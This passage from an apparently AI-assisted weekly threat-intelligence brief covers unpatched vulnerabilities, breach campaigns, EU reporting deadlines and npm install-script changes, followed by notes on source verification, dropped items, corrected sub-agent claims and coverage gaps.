  • RoguePlanet (CVE-2026-50656) has no patch and a PoC that works on June builds — watch MSRC for an out-of-band fix. Microsoft says a fix is "in development" with no timeline; the researcher warns mitigations are not reliable. Decide now whether to hold for July Patch Tuesday or push application allowlisting as an interim control. (MSRC; daily 06-19)
  • FortiBleed credential resets are not a one-and-done — expect more named victims and AD-persistence findings. CISA confirmed full AD domain takeover at multiple organisations; finish session termination, credential rotation and PBKDF2 migration, then hunt for post-compromise persistence rather than assuming the reset closed it. (SecurityWeek; daily 06-20)
  • ShinyHunters PeopleSoft notifications are still landing — more European victims are likely. Google GTIG has notified 100+ organisations (68% higher education); EU universities are a probable next-named class. Patch internet-reachable PeopleSoft and hunt the /PSEMHUB/ and /PSIGW/HttpListeningConnector paths. (daily 06-16)
  • CRA Single Reporting Platform go-live is ~82 days out (11 September). ENISA's access manual and a dry-run window are due now; in-scope manufacturers (including Swiss exporters to the EU) should register and wire the 24/72-hour reporting flow into their PSIRT process before the obligation binds. (ENISA SRP)
  • EDPB Article 33 harmonised-template consultation closes 5 August. Multi-jurisdiction breach-response owners have a window to review and comment before the EDPB sets a mandatory-adoption timeline. (EDPB)
  • npm v12 will disable install scripts by default — the Mastra compromise is this week's reminder to audit CI before the change. Sapphire Sleet's postinstall dropper is exactly the kill chain that --ignore-scripts (and the npm v12 default) neutralises; inventory pipelines that rely on build scripts now. (Microsoft; daily 06-21)
  • France's NIS2 transposition remains unresolved into late 2026. Organisations with French counterparts should track the next parliamentary session; NIS2-derived notification flows from French partners are not yet enforceable. (Viktoria Compliance)

11. Verification & coverage notes

  • Items flagged [SINGLE-SOURCE] this week: HCRG Care Group breach (§ 4; single HIPAA-focused outlet, no independent corroboration in-window); Amazon One Medical ShinyHunters 8.8 TB claim (§ 2; victim confirmed a legacy-storage breach but the data-volume figure is attacker-asserted and unverified). National-authority single sources covered by the verification carve-out: EDPB Article 33 template (§ 9; EDPB primary), CRA SRP reporting (EC Digital Strategy / ENISA primaries), NCSC-CH Week 24 Wochenrückblick (NCSC-CH primary), G7 CWG declaration (ANSSI host primary). Check Point State of Ransomware Q1 2026 (§ 7) is vendor telemetry, corroborated by Emsisoft. Tolerated single/aggregator-source items (check_brief.py WARNs, accepted): the § 8 SocGholish status-update rests on a single Proofpoint research-lab primary (acceptable — Proofpoint is the disclosing analyst); the § 3 FortiSandbox status-update is corroborated only by two aggregators (Security Affairs, Help Net Security) reflecting the still-unconfirmed-by-Fortinet exploitation report (reduced confidence on the exploitation claim accordingly).
  • Contradiction (resolved in favour of the primary): the 06-17 daily framed PAN-OS CVE-2026-0257 as an "exploitation wave with Impacket post-compromise," but the cited Unit 42 primary states "No post-access behavior or lateral movement has been identified as of this time." The weekly uses Unit 42's wording in § 3 — active exploitation confirmed, downstream lateral movement not yet observed by the primary. The Impacket detail may originate from a secondary (Rapid7/Arctic Wolf) report not re-verified this run.
  • Items dropped from this week's roll-up: VerdantBamboo / UNC5221 BRICKSTORM (Volexity 2026-06-04, out of the 8-day window and already consolidated in the W24 weekly — no fresh in-window delta); Velvet Ant "Operation Highland" (Sygnia 2026-06-11; already consolidated in the W24 weekly § long-running, no fresh delta this week beyond what W24 carried); Prinz Eugen ransomware (06-19 daily deep-dive; new Go family with a French public-sector victim but a single-day item with no cross-day weekly delta — may resurface if it acquires more EU victims); single-day daily items not meeting W-PD-1 (Rokarolla Android banker, the crypto clipboard-hijacker VirusTotal-reputation abuse, the Microsoft USB-LNK Tor worm, UpdraftPlus/phpBB/Zammad patch-only items beyond the § 3 roundup line).
  • Reduced-confidence items: the NoName057(16) G7/Haute-Savoie DDoS attribution (§ 9) rests on the group's Telegram self-claim with no independent technical corroboration in-window (W2 assessed MEDIUM); the Kodak and One Medical breach-volume figures are attacker-asserted.
  • Sub-agents: both W1 (threat-actor/research/report horizon) and W2 (policy horizon) returned within budget; both ran on Claude Sonnet 4.6. Timestamp anomaly: W1's return-line and findings.W1.yaml report ended_at=2026-06-21T23:52:00Z / duration_seconds=2694, which disagrees with W1's on-disk .ended_at checkpoint (23:17:59Z) and the wall-clock observed by the main agent (both W-checkpoints present by ~23:18Z). The checkpoint/observed time was used for the run log; the self-reported 45-minute duration is implausible against the observed ~11-minute run.
  • Verification: 4 iterations, model-rotated (iter 1 Claude Opus 4.8 → NEEDS_FIXES truth=5; iter 2 Claude Sonnet 4.6 → NEEDS_FIXES truth=5, all 7 iter-1 remediations confirmed; iter 3 Claude Opus 4.8 → NEEDS_FIXES truth=3; iter 4 Claude Sonnet 4.6 → CLEAN). All findings were truth-class accuracy corrections — sub-agent-asserted specifics that did not trace to the cited primaries on independent re-fetch — and every one was remediated before publish: DORA "one-third" reframed from third-party to cross-border impact; Check Point EU-% figure removed (it was healthcare-sector, not EU-wide); INC ransomware victim geography corrected (majority-US, not non-US) and unverifiable NHS victim names dropped; SocGholish figures aligned to Proofpoint (over 100 servers / 14,971 sites / seven residual clusters); EDPB template structural specifics and the NCSC-CH e-vignette claim removed as unsourced; Mastra publish-window and Klue victim-list corrected; the NIS2/CER item stripped to source-supportable claims. Residual count: 0 (clean publish at iteration 4).
  • Coverage gaps: databreaches-net (persistent HTTP 403, rotation-priority); inside-it-ch (Cloudflare 403, persistent); finma-ch (no in-window guidance — quiet); ofcom-bakom (no in-window publication — quiet); ncsc-ch-week-25 (Week 25 Wochenrückblick not yet published, HTTP 404 as of run end); acronis-tru (HTTP 403, content recovered via The Hacker News); bleepingcomputer (HTTP 403 on two articles, recovered via secondary sourcing).